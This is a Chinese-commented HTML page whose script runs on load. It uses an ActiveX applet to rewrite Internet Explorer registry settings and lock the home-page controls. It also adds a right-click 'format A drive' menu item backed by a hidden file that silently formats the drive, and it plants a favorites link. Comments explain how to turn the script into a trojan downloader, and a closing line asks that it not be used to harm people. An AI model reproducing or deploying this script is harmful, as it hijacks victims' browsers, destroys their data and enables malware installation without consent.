<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet> 

<script> 

//定义收藏变量 

function AddFavLnk(loc,DispName,SiteURL){ 

var Shor=Shl.CreateShortcut(loc+"\\"+DispName+".URL") 

Shor.TargetPath=SiteURL 

Shor.Save()} 

//定义变量 

function reg(){ 

try{ 

//设定applets为0 

a=document.applets[0] 

a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 

a.createInstance() 

Shl=a.GetObject(); 

a.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") 

a.createInstance() 

FSO=a.GetObject() 

a.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}") 

a.createInstance() 

Net=a.GetObject() 

try{ 

//开始写注册表 

//设定IE的标题为Internet Explorer 

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Internet Explorer") 

//设定IE的默认首页为空白页 

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank") 

//让设定首页那项变灰 

Shl.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0x1,"REG_DWORD") 

//让设定分级审查设定那项变灰 

Shl.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings",0x1,"REG_DWORD") 

//在网页右键菜单中加入调用文件的命令 

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\","c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}"); 

//写入值为0xf3的dowrd值 注意[REG_SZ:字符型 REG_DWORD:双字节型 REG_BINARY:二进制型] 

//对于REG_DWORD型和REG_BINARY型则有两种赋值方式 

//直接用十进制的数表示，如：0，1等 

//用十六进制的数表示,如：0x12,0xff等 

Shl.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\MenuExt\\格式化A盘\\contexts",0xf3,"REG_DWORD") 

//结束写注册表 

//开始写硬盘 

//生成一个名为c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}的文件 

hd=FSO.CreateTextFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}") 

//把这个文件写入javascript内容 

//脚本中的start /m 为最小化窗口 /autotest为自动 /u为无条件格式化 /q为快速 

hd.write('<script>a=new ActiveXObject("WSCript.Shell");a.run("start /m format.com a:/q /autotest /u");alert ("正在更新a盘系统文件,请稍等......");<\/script>') 

//关闭这个文件 

hd.close() 

//把这个文件下载到客户机的c盘中,这里的路径完全可以改成网络上的，然后在后面接上.Copy("d:\format.txt"),这个脚本可以改成下载木马 

//格式为file=fs.GetFile("网络路径").Copy("运行路径") 

//这个脚本如果配合asp，那么完全成了一个功能非常强大的木马了 

file=FSO.GetFile("c:\\format-a.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}") 

//设定这个文件的属性为隐藏 

file.Attributes=6 

//结束写硬盘 

//开始定义收藏格式 

var WF,Shor,loc 

WF=FSO.GetSpecialFolder(0) 

loc=WF+"\\Favorites"; 

if(!FSO.FolderExists(loc)) { 

loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName+"\\Favorites"; 

if(!FSO.FolderExists(loc)) { 

return}} 

//收藏内容 

AddFavLnk(loc, "浪漫情阁", "http://5meng.com")} 

catch(reg){} 

} 

catch(reg) 

{} 

} 

function flash() 

{ 

//隔100毫秒就运行一次 

setTimeout("reg()",100) 

} 

flash() 

//最后再重申，这个脚本不可用来害人，谢～ 

</script>